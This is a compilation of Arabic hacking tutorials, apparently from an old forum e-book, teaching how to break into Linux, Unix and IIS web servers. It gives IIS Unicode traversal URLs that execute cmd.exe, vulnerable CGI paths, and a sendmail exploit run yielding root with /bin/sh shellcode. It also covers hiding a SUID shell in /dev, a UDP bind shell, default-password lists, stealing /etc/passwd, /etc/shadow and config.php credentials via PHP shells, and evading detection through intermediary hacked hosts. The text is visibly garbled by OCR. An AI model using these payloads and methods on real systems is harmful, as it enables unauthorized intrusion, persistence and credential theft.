file.pl/.
جـ -:علشان تحويل الملف لزم انته تخلى الملف يكون ملف تنفيذى بهذه المر
<------ gcc -o Conik Conik.cلحظ انه انته تكتب أسم الملف بدال أسمى كونيك المراد تغيرة
Conik.c/.
sendemail/. $
234
لحظ انك انته تكتب هنا الموقع الى تبغاه مكان israel
...connecting to host
...connected
id
(uid=0(root) gid=0(root
لحظ انه طلب ممنا الملقم للبرنامج Sendemailوكمان طلب نظام التشغيل واليوزر والباسورد
وبعد هذه كله البرنامج أعطانا أمتياز Rootبسبب قيام البرنامج بتنفيذ الـ Exan nofer
ملحظة ل تضن أنه لمن انا حطيت البرنامج XXX. SENDMAILبدون اى سبب أنا حطيت لك هذه المثال
لنه هناك ثغره فى هذه البرنامج
وراح أشرحها لك أن شاء ال تعالى بس كان بدى تحفظ السم هذه (-:
جـ -:لووووول حبيب البى هذه الطريقة المعقده شوية للثغرات في ثغرات ثانية حلوة وسهله جدا جدا
س -:6أيش هي قو ل يا Conikترى هذه الطريقة يبغالها نظام تشغيل وكمان لغه Cو Perl
في تغرات تستخدم من خلل المتصفح يعنى انته تشوف ملعومات الموقع عبر المتصفح وتوصل الى ملف
الباسوردات من هذه الطريقه
س -:7اوووووة UNICODEأنا سمعت عنها كثير نفسى اشوف كيف شكلها وأعرف ويش هى ؟؟؟
جـ -:حبيبى UNICODEهى عبارة عن ضعف في نظام IISفي Microsoftمما تساعد في أختراق
الموقع بكل سهوله عموما الختراق بهذه الطرق سهل جدا
مقارنة بالطرق السابقة التى تم ذكرها من قبل وسوف أضع أمثله على ثغرات -: UONICODE
vti_bin/.._/
%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
Rpc/../
%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
\:+c
samples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
235
adsamples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c /
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
cgi-bin/view-source?../../../../../../../etc/passwd /
cgi-bin/phf/
cgi-bin/wwwboard.pl/
cgi-bin/AT-admin.cgi/
cgi-bin/info2www/
cgi-bin/environ.cgi/
هذه وباقى العديد من الثغرات يعنى ل يقتصر المر على هذه الثغرات وراح أقسم الثغرات لك بحسب نظام
التشغيل
Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , ProFTPD,
,WU-FTPD, Kernel Exploits, rootkits
UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel
,exploits, rootkits, ProFTPD, WU-FTPD
،،،انتهى
236
"استغلل لينكس في اختراق المواقع "
>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<
>ةةةةةة<Black_sNiper :
هذا الموضوع مخصص لمن أراد التعامل مع لينكس في اختراق المواقع وليس لديه الخبرة الكافية فيه...
سوف يكون هذا الموضوع عن العمليات التي يستحسن القيام بها بعد الحصول على كلمة السر والنجاح في
الدخول على النظام..
أول يجب ان تعرف بأنه يمكن ان تدخل على بعض النظمة باستخدام بعض الكلمات المشهورة وتوجد بعض
النظمة تسمح لك بتنفيذ أمر واحد ثم تقوم باخراجك من النظام بعد ذلك وأفضل تلك الوامر هي .:
who
rwho
finger
237
وتستفيد من هذه الوامر بأنك تستعرض اسماء المستخدمين للنظام وبذلك يمكن ان تستخرج كلمة السر من
نفس السم وذلك لن بعض المستخدمين يستعمل كلمة سر مشابهة تقريبا لسمه مثل .:
username : Black
password : Black2
من الملفات المهمة والتي يجب عليك استخراجها بعد دخولك على أي نظام .:
etc/passwd/
etc/group/
etc/hosts/
usr/adm/sulog/
usr/adm/loginlog/
usr/adm/errlog/
usr/adm/culog/
usr/mail/
usr/lib/cron/crontabs /
etc/shadow/
وأخيرا تقول exec loginوتكتب أي اسم وبذلك تكون انت مدير النظام!!
ما الذي سوف تواجهه عند دخولك على أي نظام بكلمة سر واسم مستخدم ؟!!
عند دخولك الى النظام ستقابل احدى هذه الحتمالت .:
اما انك استطعت الحصول على حساب مدير النظام )الروت( أو انك حصلت على حساب مستخدم آخر..
في البداية تكتب المر التالي .:
$ pwd
والنتيجة تظهر .:
$ /usr/admin
النتيجة اظهرت انك استطعت الدخول على المدير وبذلك تستطيع التعامل مع كامل النظام بدون قيود..
اذا ظهرت نتيجة غير تلك النتيجة ..فمثل :
$ /usr/Black
فهذا يدل على انك دخلت على حساب هذا المستخدم!!
ولعرض ملفات هذا المستخدم تكتب التي .:
$ ls /usr/Black
وسوف يعرض لك ملفات هذا المستخدم .:
mail
pers
games
bin
ولكن هذا لن يعرض ملف profile.
ولكي تستعرضه تكتب التي .:
$ cd
238
$ ls -a
:
:
profile.
$
اذا اردت قراءة محتويات ملف فسوف تكتب المر التالي .:
$ cat letter
وهذا اذا افترضنا ان الملف المطلوب هو letter
اذا اردت عمل محادثة مع مستخدم آخر على اتصال فتكتب المر التالي .:
$ write
واذا اردت قراءة الملف المحتوي على كلمات السر المظللة يجب ان تكون قد دخلت على النظام باستخدام
حساب المدير نفسه ..ولستعراض ملف كلمات السر نكتب .:
$ cat /etc/passwd
:/:root:F943/sys34:0:1:0000
sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh
وهذا يعني انه يمكن للمستخدم الحتفاظ بكلمة السر لمدة ثلثة اسابيع بدون تغيير وانه يجب ان يغيرها كل
ستة اسابيع ..
استعراض ملف المجموعة كالتالي .:
$ ls /etc/group
root::0:root
adm::2:adm,root
:bluebox::70
239
ويمكن ان يحتوي ملف المجموعة على كلمات سر أو ليحتوي !!
اذا كان ليحتوي على كلمة سر فانه يمكن ان تصبح انت مديرا للنظام في حالة دخولك بكلمة سر لمستخدم
عادي وليس كمدير للنظام وذلك بعدة طرق ..
انتهى،،،
>منقول<
>الكاتب :ايسر <
240
بالنسبه لنظمه التشغيل :
طبعا ..ل يمكنك ان تخترق باستخدام نظام التشغيل .. windowsبل تحتاج الى اي نظام مشتق من نظام
التشغيل اليونيكس ..
حسنا ..السؤال هو لماذا هذه النظمه بالذات ...و لماذا ل يصلح الويندوز؟؟
لسبيبن :
-1النترنت اغلبه اجهزه شغاله على اليونيكس سيستمز ...و نادر لما تلقي جهاز شغال على الويندوز nt .
9x
اذن اقل حاجه حتى تخترق جهاز او سيرفير شغال على اليونيكس ..يجب ان تكون ملما بنظام التشغيل هذا..
لذا من الفضل انك تركبه في جهازك ..
-2طبعا ..معظم اادوات و اكواد الكسبلويتات مصممه للعمل في بيئه اليونيكس ..
بالنسبه لليونيكس التجاري ل يمكن ان تركبه على جهازك العادي ..لذا فيمكنك تجاهله الن (:
اما المجاني فيوجد منه عده عائلت
BSD-
و هي القدم و الصعب في الستعمال ..و من الفضل لك ال تستعملها ال اذا كنت ترغب في تركيب سيرفير
على الجهاز
...
يوجد اللينكس ..و هو طبعا غني عن التعريف
طبعا ..يوجد منه العديد من التوزيعات و ان كان افضلها هي ) SuSeلم اجربها و لكن اسمع الكثير من
الناس يشكرون في هذه التوزيعه (
اما بالنسبه لسهل توزيه فهي MDKو قد و ضعت هنا بعض الدروس الخاصه بالمندريك
يمكنك تحميلها و قرائتها ..
ان لم تجد مكانا تحصل منه على اللينكس يمكنك مراسلتي على ايميلي و نحدد مكانا
لتسليمك نسخه من الماندريك 9او الريد هات ) 7.2ثمن السطوانات البلنك و النسخ فقط (
على اي حال ..للينكس مميزات كثيره ..امن ...مستقر ..مجاني ..يمكنك تطويره ليلئم امكانيات جهازك ..
-النترنت
..ماذا ...تريد ان تخترق ..جميل جميل ..تريد ان تخترق جهازك ام ماذا ؟؟
اه..تريد ان تخترق اجهزه مبحره في النترنت ...اذن ..دعنا نبحر على النترنت (:
انا عارف انك حصلت على الدرس ده من النترنت ..لكن هذا كان عن طريق الويندوز
..لكن انت اليوم انسان مختلف ...انت انسان لينكسي ..ذه فلسفه محترمه ..
اذن يجب ان تبحر الى النترنت من نظام اليونيكس ..لن اساسا يجب ان تعرف المودم بتاعك على اللينكس
حسب التوزيعه اللي عندك ..حاول تعرف المودم ..حتلقي ان اللينكس لم يجد اي مودم موصل بالجهاز ؟؟
ما هذا ..ل تتعجب ..
فكل المودمات الداخليه internalيطلقون عليها .. winmodems
لماذا لنها مصممه اساسا للعمل تحت نظام التشغيل .. windowsارجوك ل تلوم اللينكس ..
بل يجب ان تلوم صانع كروت الفاكس الداخليه هذه (:
اوكي ..اما بالنسبه للمودم الخارجي externalفهو مودم حقيقي real or true modems
...يوجد العديد من المودمز الخارجيه مثل acorp , u.s. robotics
يجب ان تتاكد ان المودم يكون serialو ليس USB
على اي حال خلينا في موضوعنا...
خلص ..ادخل على النترنت من خلل ال ispوذلك من خلل نظام الليونيكس (:
241
اهم حاجه قبل الشروع في الختراق هي ان تحاول ال يتم اليقاع بك و كشف محاولتك لختراق سيريفير
معين ..
و طبعا هنك و سائل عديده لذلك لن اتطرق اليها لن هناك العديد من الشروح المتميزه في مجال الحمايه
وازاله الثر
الخصهم في نقطتين او ثلثه :
-1ايك ان تحاول ان تسجل في موقع تحاول اختراقه ..و ل حتى باسامي مزوره لن هذا قد يجعلك عرضه
لكشف الي بي الخاص بك
و من ثم ال ispثم رقم هاتفك و صباح الفل ...ت
-2اياك ان تتباهى باختراقاتك ابدا اما غير المهتمين بامور الهاك ...
-3احاول ال تخترق دائم من خلل جهازك ...ل ل ..انت فهمتني غلط ..مش قصدي يعني تروح لنت
كافيه (:
جهازك =====< الجهاز الضحيه ...ده مش مامون ..لكن
جهازك======< جهاز وسيط======< السيرفير الضحيه ...ده كده كويس اوي
طيب ايه الجهاز الوسيط ده ..ده ممكن يكون مثل جهاز مخترق من قبل او شيل اكاونت .
طيب ماهو الشيل اكاونت :هو عباره عن خدمه حيث يمكنك من خللها التحكم في جهاز من بعيد و هذا
الجهاز عليه نظام اليونيكس
طبعا من غير ان تقوم باختراق هذا الجهاز ..و يوجد العديد ممن يقدمون هذا الحدمه مجانا ..
-4حاول ان ل تخترق اجهزه خطيره و مهمه مثل gov .mil.او سيرفيرات اجب عليك قبل ان edu.و
غيرها من هذا النمط.
-5هذه النقطه تعتمد على بعض تقنيات الفريكينج ..لعمل اخفاء لرقم تليفونك عن مزود الخدمه لديك .
REdirecting
يجب عليك قبل ان تقوم بالختراق ان تعرف كيف يمشي النترنت ..انه يعتمد على بروتوكول يدعى
TCP\IP
و بعض البروتوكولت الخرى ....
طيب ...ركز معايا ابوس ايدك =D
المفروض ان كل جهاز على النت بيكون فيه بورتات مفتوحه ..هذا البورتات يمكنك ان تقوم من خللها
بارسال الداتا
من جهاز الى ذلك الجهاز ..هذه البورتات المفتوحه ) المفتوحه فقط ( تكون على استعدد دائما لتلقي الداتا من
ريموت بوكس
دائما ما ترتبط البورتات المفتوحه بما يسمى بخدمه << service..
و هذا الخدمه serviceتكون مستضافه من خلل ديمون daemon or server
اذن ..الديمون هذا اذا قام صاحب الموقع بفتحه في السيرفير فانه يقوم بفتح منفذ في السيرفير ..لكي يقوم
الديمون هذا من خلله بتقديم الخدمه الملعونه =D
و هذه بعض الخدمات مع البورتات الخاصه بهم ..لكن طبعا هناك كثيير
مثال :لو سيادتك قمت بزياره هذا العنوان من خلل المتصفح مثل www.host.netماالذي يحدث ؟؟
يقوم المتصفح بالتصال بالموقع من خلل بورت ال TCPرقم 80
ثم يقوم بارسال المر
GET /HTTP/1.1 /index.htmlواوامر اخرى كثيره ..
ثم بعد ذالك يقوم الموقع المطلوب بارسال كود الهتمل الخاص بالصفحه index.html
242
الشيء الطريف ان ال daemonsدي مليئه بالثغرات المنيه الخطيره ...و هوه ده اللي احنا محتاجينه
=<
اذن لكي تقوم باختراق موقع يجب ان تعرف اي ال daemonsالموجوده عل السيرفير لذلك يجب عليك
ان تعرف
ماهي المنافذ المفتوحه في السيرفير المستهدف ...اذن كيف تحصل عى المعلومات هذه ..
من خلل ما ال ... port scanersالسكانرز هي عباره عن برامج تحول ان تتصل بالسيرفير المستهدف
من خلل جميع المنافذ ..و ذلك لمعرفه اي البورتات المفتوحه
في هذا السيرفير ...اشهر هذا السكانرز هي الداه nmapبواسطه fyodorو لحسن الحظ يوجد نسخه
منها خاصه بالويندوز و !!..ايه ده ..؟؟
احنا مش اتفقنا ننسى الويندوز ده خالص =>
/http://members.lycos.co.uk/linuxdude/e3sar
طيب..بالنسبه للينكس يمكننا ان نحصل على نسخه nmapعلى هيئه rpm
و لتركيبها اتبع التالي :
bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
ثم نقوم بالتشغيل ..و ان شاء ال سنحاول على مدار الدرس باستخدم الموقع target.eduكمثال لموقع
مستهدف ..
اتبع التالي :
bash-2.03$ nmap -sS target.edu
اذن لقد قام ال nmapبعمل فحص شامل على الموقع و قام بمعرفه المنافذ المفتوحه كم ترى!!
اذن يمكننا ان نعرف ايضا اي الخدمات و ال daemonsالموجوده في الموقع target.edu
لكن يلزمنا اداه معينه للتصال بالموقع من احد هذا المنافذ ..فكر معي ماهي هذه الداه؟؟؟
نعم انها التلنت ..اه ..صحيح ان التلنت هوه خدمه ..من خلل التلنت ديمون ..و لكنه ايضا عباره عن
برنامج بسيط ..يمكنك من خلله التصال باي موقع بمنفذ معين من خلل ال ... TCPتعال نشوف مثال :
243
quit
.Goodbye 221
Connection closed by foreign host
اهااااا
(: دول دلونا على معلومات قيمه اوي اوي
SunOS 5.6 نظام التشغيل هناك هو-1
sunOS اللي بييجي مع نظم السنstandard ديمون الف تي بي هناك هو ال-2
244
يانهار اسود |:
نظام التشغيل اللي الده قامت بتخمينه هو لينكس !!!!!!
مش كان !!!!!! sunOSاه يا و لد الكلب =@
بس احنا برده لزم نعرف توزيعه اللينكس الوجوده ..لكن نقدر نقول ان المعلومات اللي جمعناها كفايه و
ممكن تمشي
طيب ..كده احنا قمن بعمل سكان على الموقع و لكن ممكن احد الدمينز لو عرف ان اننا قمنا بفحص
موقعه ...اعتقد نه حيكون زعلن منن و حنا مش عايزين الدمين يزعل مننا لذلك
استخدمنا الختيار Ss-على اي حل فان عمل سكان لموقع يعتبر عمل شرعي ل مشاكل فيه =D
لمزيد من المعلومات راجع:
bash-2.03$ man nmap
ملحوظه :عيب اوي انك تاخد المرين دول كقاعده مسلم بيها ..كل اكسبلود و له اوامره الخاصه في
الكومبايل و له طريقه في التشغيل
تظهر هذا الطريقه في التعليق البرمجي او في ال . usage
245
http://www.linux.com.cn/hack.co.za
مثل ده فيه كل حاجه ممكن تتخيله ..مقسمه الى ديمونات و نظم تشغيل
و لكن ..ماهي الكسبلويت ؟؟
الكسبلويت عباره عن سورس كود عاده مكتوب فبلغه السي او البيرل المهم ان
الكسبلويت دي تقوم باستغلل منطقه معينه في السيرفير ..في حاله TARGET.EDU
يمكننا ان نستخدم الكسبلويت الخاصه ب sendmail 8.11.0او اي ديمون اخر
على فكره العيال ديما اسمعهم يقولوا ان السند ميل هو اكبر ديمون معرض للختراق ..مش عارف ايه السند
ميل اساسا ؟؟
طيب رووح للدرس ده و نت تعرف :
http://www.pharaonics.net/less/NEtworks/124.htm
فيه حاجه لزم تعرفها .ان لما تشغل اكسبلويت على سيرفير معين ..ايه الفوائد اللي جتعود عليك )غير طبعا
اختراق الموقع (
حتحصل على حاجتين اتنين ..اول حاجه شيل عادي ....
تاني حاجه و ده المهم بالنسبه لنا مايسمى بالرووت شيل ..
طبعا انت لو اخدت رووت شيل على السيرفير اذن فانت كده تمتلك كفه الصلحيات و ممكن تعمل كل اللي انت
عايزه ..ممكن تستعمل الرووت شيل ده كجهاز و سيط زي ما قلت في اول الدرس
..طيب زي ما قلت ان كل اكسبلويت مختلفه عن الخرى و يجب عليك ان تقرا الكود بتاعها او التعليقات اذا
كنت ل تفهم في لغه البرمجه ..
من اسهل و اشهر الكسبلويتات هي البفر اوفر فلو ...يقوم هذه الكسبلويت بعمل ) دربكه في الديمون (
مم يؤدي الى تشغيل الكود الذي تريده
يقوم هذا الكود بتشغيل شيل في السيرفير لذلك فهو يسمى شيل كود shell code
طبعا يختلف هذا الكود تبعا لنظام التشغيل ..لذلك يجب علينا ان نعرف نظم التشغيل المستخدم في السيرفير
لو شوفنا كود اكسبلويت معينه ممكن نلقي ده
= []char shellcode
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b
"
"\
"x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd
"\;"x80\xe8\xdc\xff\xff\xff/bin/sh
246
.<Last login: Fry Sep 15 11:45:34 from <yourIPaddress
sh-2.03
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
sh-2.03$./exploit 25 target.edu
247
لكي تقوم بعمل sushiاو suid shellيلزمك ان تقوم بنسخ ال bin/sh/
الى مكان خفي و نقوم باعطاءه صلحيات ال suidكالتالي :
sh-2.03$ cp /bin/sh /dev/nul
هههههه
في اغلب الحيان الدمين ل ينظر داخل الدايركتوري .. devو لو حصل و نظر دخله فانه لن يشعر بشيء
غريب لن فيه ملف اساسا اسمه null
= Dل ده احنا عيال جدعان اوي =D
sh-2.03$ cd /dev
sh-2.03$ chown root nul
248
طبعا احنا رووت ..ليه لن الخ doodكل من ال gidو ال uidيساوي صفر
البايند شيل هذا يقوم بفتح بورت او منفذ يعني و لكنه ليس منفذ TCPبل منفذ UDP
و طبعا بيعطيك شيل عند التصال بهذا البورت ..
الطريف و الشيق في الموضوع انه الدمين لما ييجي يعمل سكان على الجهاز بتاعه للتامين عاده و في اغلب
الحيان السكن يكون
على منافذ ال TCPو نادرا جدا ان يعمل سكان على منافذ بروتوكول UDP
usr/adm/lastlog/
var/adm/lastlog/
var/log/lastlog/
sh-2.03$ who
root tty1 Sep 25 18:18
249
هذا الموضوع هو عباره عن نبذه بسيطه للمبتدئين يمكنهم من البدايه بدايه موفقه باذن ال ..
اتمنى ان يحوز على رضاكم.
انتهى،،،
اختراق لينكس...
و أنا كالعادة لست مسؤول عن أي تصرف غبي أو أحمق يقوم به أي شخص و هذه المعلومات للعرض و
زيادة المعرفة الشخصية
في هذا القسم أقوم بشرح الخطوات الساسية للقيام بعملية اختراق و تخريب على الشبكة فإذا كان لديك أية
معلومات أو شروح تود نشرها في هذا القسم الرجاء القيام بإرسالها لنا
الـــهـــكـــر
نحن هنا في حاجة إلى خلفية بسيطة قبل الخول في التعقيدات
250
إن قول اختراق أو تخريب يعني الحصول على صلحيات على سيرفرات الشبكات ل يسمح لنا بالحصول عليها
في الحوال العادية فخوادم الشبكات معدة لستقبال العديد من الناس و لكل فرد منهم حساب على الشبكة
فالنفترض أن لراشد حساب على الفريسرفرز
هناك طريقتان رئيستان للدخول إلى نظام الولى تتمثل في الحصول على خليط من كلمة سر و اسم مستخدم و
هي بطيئة و نادرة وأما الطريقة الثانية فهي استغلل مناطق ضعف الخادم و التسلل من خللها
إن التخريب ممنوع و لنه من السهل مطاردتك إن إكتشاف محولتك للختراق عن طريق الي بي أدرس فهو
رقم تعريفك على الشبكة و الحل هو أن تقوم بإعطاء بينات خاطئة لمزود خدمات شبكتك
يستخدم المخترقون أدوات لسرقة الرقم السري و اسم المستخم من الماكن العامة مثل مقاهي النترنت و هذا
أحد البرامج
قم بتغيير البروكسي و هذا هو السهل أو التسجيل ببيانات و همية لموقع يضمن لك التصفح بخصوصية و قم
بتعطيل خدمة Caller IDإذا كانت تعمل
لبد أنك جاهز الن قم بتشغيل notepadeونافذة متصفح جديد من خلل محطم أي بي أو أي موقع آخر
مثل
Hakkerz.home.ml.org
قم بفحص الموقع و تسجيل أي إيميل موجود و قم بنسخ htmlلي صفحة مهمة
@Blahblahblahاسم الموقع
و ينصح بإرساله من موقع بريد مجاني واستخدام جميع امكانياته المهم سيأتيك إيميل بسبب عدم جود البريد
المرسل إليه و معه بعض المعلومات الموجوده في headerالرسالة
أنت الن في حاجة إلى أدوات تعقب لمعرفة بعض المعلومات عن المزود للخادم الضحية
أول ستحتاج إلى الي بي IPو ثانيا خدمة التعريف Whoisلتحصل عن معلومات عنه
251
الن عليك باستخدام خاصية fingerجرب أول
و إذا لم يقم بإعطائك معلومات التي قد تكون مفيدة جرب ايميل من التي حصلنا عليها في العلى
الن عليك القيام بفحص المنافذ scan portsللي بي IPالذي حصلنا عليه لكي تعرف المنافذ المفتوحة
و الخدمات التي يدعمها الموقع و هناك برامج جيدة لذلك و معظمها لنظمة Linux /Unix systems
و إن كنت ستخترق موقع شديد الحراسة فدعنا ننسى تفحص المنافذ لمدة لن هذا العمل غير شرعي و قد يتم
الكشف عنه إل إذا ما كنت تمتلك نظام linuxما يهمنا من ذلك أنه إذا كان المنفذ 21مفتوحا فيعني ذلك
أنهم يدعمون FTPو إن كان 23فذلك أنهم يملكون TelNet
Telnetالهدف من ذلك هو معرفة نوع السيرفر و أنت في وضع Anonymousفي متصفحك و على
العموم للقيام بكل تلك المور سالفة الذكر ستجد ما تحتاجه في الموقع التالي حتى ل تتعب في البحث
hakkerz.home.ml.orgالمهم فلنتابع حديثنا قم بفتح نافذة telnetو غير المنفذ إلى 23و إذا كان
الموقع يبدأ ب wwwفجرب ذلك بدونها فإن لم يقم بإعطائك بينات فجرب إضافة telnet.Victim.com
كلمة telnetكما ترى مكان wwwو إذا لم ينجح جرب أي من مواقع السرفرات التي حصلنا عليها من
whoisو بمجرد نجاحك في الدخول قم بتسجيل أية بيانات تحتاجها و بالتحديد نوع السيرفر
الن قم بتغيير المنفذ إلى 21و الن سيأخذك إلى منفذ ال ftpفإن حصل ذلك جرب كتابة
SYSTلتعرف نوع السيرفر الن إذا كنت محظوظا جرب المنفذ 80الذي يعد منفذ ال httpوسجل أي
بينات و أهمها على الطلق نوع السيرفر فإذا لم تنجح بعد ذلك كله جرب برنامج يدعى Whats
?Runningو قد يعمل و لكن سيرفر الضحية سيسجل ذلك
و كما ذكرت في البداية هناك طريقتان استخدام البرامج أو ايجاد الباسوورد و لنجرب الن الباسوورد الذي
ستحصل عليه باستخدام
Login: root$
Password: root$
فلنقم بتجربة هذا أول حيث أن برامج linuxتأتي محملة بعدد من الباسوورد الجاهزة و هي غالبا تبقى كما
هي لذلك عليك القيام باتصال باستخدام telnetو الذي هو من الموقع سالف الذكر و ل تستخدم البرنامج
العادي الموجود على جهازك وقم بتجربة الباسوورد و اسماء المستخدمين التالية
ACCOUNT: PASSWORD
)login) root: (password) root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
252
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
و إذا لم تصلح فإن هناك العديد من الناس الغبياء الذين يستخدمون أسماء الدخول كباسوورد قم بتجربة
الشق الول من البريد اللكتروني كإسم مستخدم و كذلك كباسوورد أو من البيانات التي حصلت عليها من
whoisو أن كنت تعيس الحظ إلى الن قم بالتجربة التالية على افتراض أنك تحاول الدخول إلى نظام unix
فإنك لربما تتساءل كيف يتعرف النظام إلى الباسوورد و الجواب أن هناك ملف يدعى passwdلذلك علينا
المحاولة للوصول إليه و إحدى الطرق القديمة هي استخدام ال ftpو الذي سندخل إليه باستخدام نافذة
المتصفح و في نظري internet explorerينفع في هذه الحالة و لكن عليك أن تكون غير معرف لهم و
كما فتحنا النافذة سابقا باستخدام IP jammerالموجود في موقع .hakkerz.home.ml.orgسنعيد
الكرة ثانية بل إن عملنا السابق و القادم يعتمد على اخفاء الي بي و قم بالتجربة عن طريق الشكل التالي
مثل
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW
administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
][.etc
و هنا ترى اسم المستخدم و هو kangarooو تشفير الباسوورد وليس هي هو 3a62i9qrأو سيكون
المنظر فوق أشبه بالتالي
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu
TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
و هنا كما تشاهد فإن الباسوورد المشفرة استعيض عنها بباسوورد يصعب فك تشفيرها و هو
*’ sأو ?x’sو إن حصلت على النوع في العلى فإن هناك برامج مخصصة لملفات الباسوورد ليونكس و
فك تشريرها مثل John the Ripper 1.5و الذي يحتاج إلى ملفات كلمات كثيرة.
انتهى،،،
253
" درس عن الـ ) PHP Shellالجزء الول( "
ل فسمحولي (:
الموضوع بسيط جدًا لكن سأطوله قلي ً
اوًل :
ثانيًا :
254
الن وبعد قراءتك الموضوع كامل اتوقع منك معرفة ما هو الـ PHP Shell
**-----------------------------------------------
اوامر لينكس
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
لعادة التسمية
**-----------------------------------------------
255
مثال ls --help :
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
256
-1ستجد مربع للكتابة قم بكتابة المر المراد تنفيذه
**-----------------------------------------------
لكن ليست مستحيله وسنستعرض بعض الطرق التي اتبعها انا شخصيًا
**-----------------------------------------------
-2لنفرض اننا نريد اختراق موقع معين وكان صاحب الموقع ذكي جدًا وحريص
هذي طريقه قد تنفع اوًل تحديد الشركة المستضيفة و نحاول البحث عن مواقع
في نفس السيرفر او على القل في نفس شركة الستضافة يكون صاحبها دلخ
**-----------------------------------------------
انتهى،،،
257
" درس عن الـ ) PHP Shellالجزء الثاني( "
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
طرق الحصول على الباسورد هي من اصعب الطرق التي قد تواجه المخترق .
**-----------------------------------------------
ويمكن اخذ الباس عن طريق تنفيذ المر التالي في الـ PHP Shell
الذهاب الى المجلد الذي يوجد فيه هذا الملف وكتابة المر التالي
cat config.php
258
**-----------------------------------------------
ويمكن اجاد هذا الملف في احد مجلدات السيرفر واذا لم تجده قم بفتح
user:nymw4oS3oerdY
**-----------------------------------------------
وهو تابع للفرونت بيج ويوجد به الباسورد الخاص بالفرونت بيج مشفر DES
_vti_pvt
user:nymw4oS3oerdY
**-----------------------------------------------
انتهى،،،
259
" درس عن الـ ) PHP Shellالجزء الثالث( "
بما انك الن عرفت معظم الشياء لكن لبد من وجود مشاكل سأذكر الذي اصابني
**-----------------------------------
home/
ls -a /home
ls -a /home/SITE
**-----------------------------------
بعض السيرفرات ل تسمح بدخول homeالموقع ال اذا كنت انت روت او صاحب الموقع
الحل :
260
قم بدخول :
/home/site/public_html
او
/home/site/www
**-----------------------------------
هذه مشكله من الصعب حلها ويجب استعمال باك دور خاص بكرنل السيرفر
انتهى،،،
261
" شرح أداة " anmap
>ةةةةة<
>ةةةةة ةةةةةة :ةةةةة ةةةةةة<
السم :
- nmapأداة كشف عن الشبكات و ماسح أمني
الخلصة :
أنواع المسح -الخيارات
الوصف :
صمم هذا البرنامج لكي يسمح لمدراء النظام و الفراد بمسح شبكات كبيرة
لتقرير و معرفة المضيفين وماذا يقدمون من خدمات .وتدعم النماب
عدد كبير من تقنيات المسح مثل :
UDP
()TCP connect
(TCP SYN (half open
(ftp proxy (bounceattack
Reverse-ident
(ICMP (ping sweep
FIN
ACK sweep
Xmas Tree
SYN sweep
.and Null scan
262
detection of down hosts via parallel pings
decoy scanning port
filtering detection
direct (non-portmapper) RPC scanning
fragmentation scanning
flexible target and port specification
نتائج النماب عادةًا ماتكون على هيئة قائمة بالبورتات المهمه التي توجد
في اللة التي أجريت عليها عملية المسح .والنماب دائمًا يعطينا البورتات وإسم الخدمة والعدد والحالة
والبروتوكول
المرشحة تعني أن هناك فايروول أو فلتر )مرشح( أو أي عقبة أخرى تغطي هذا البورت وتمنع النماب من
معرفة حالة البورت إذا كان مفتوحًا أو ل
غير مرشح تعني بأن هذا البورت معروف لدى النماب بأنه مغلق
ول يبدو أن أي فايروول أو فلتر )مرشح( تدخل في محاولة النماب
والبورتات غير المرشحة هي أغلب الحالت ول يمكن معرفتهم إل في حالة واحدة ،هي أن يكون معظم
البورتات
التي أجريت لهم عملة المسح في حالة ترشيح
وبالعتماد على الخيارات المستخدمه في النماب فيمكن أن يبلغ عن الحالت المميزة التالية في الريموت
هوست :
النظام المستخدم
TCP sequencability
انتهى،،،
263
" طريقة لقتحام السيرفرات بدون ثغرات "
استخدام الثغرات انا بصراحه ماشوف فيه اي فن ول علم بصراحه انت تستخدم شي جاهز وهذي وجه نظري
يعني ماتحس انك تسوي شي متعب ياخذ منك جهد ووقت
لكن في طرق كثيره جدا غير استخدام الثغرات ويمكن كل واحد له طريقته واسلوبه حتى في استغلل الثغرات
لكن بما انك انسان يفترض انك هاكر وتشوف نفسك متمكن اعتقد مسئله اقتحام سيرفر او موقع ماراح
تربطها بوقت وزمان يعني ممكن الواحد يجلس يحاول لمده شهر شهرين ثلثه وكل مره يفشل الين يقدر
يوصل في الخير لنتيجه وعلى الساس هذا انا كتبت الموضوع هذا الي انشال اتمنى انه يكون مفيد وينفعنا
ال فيه
ماراح نتكلم عن المشاركه) احس اني ازعجتكم بمواضيع المشاركه (
فيه طرق معروفه تمكنك من الدخول ولو بنسبه %50على اغلب السيرفرات الموجوده بالعالم لحظ %50
اول الجهمات الولى دائمايكون الغرض منها تكوين معلومات عامه عن السيرفر الذي يراد مهاجمتته ومن
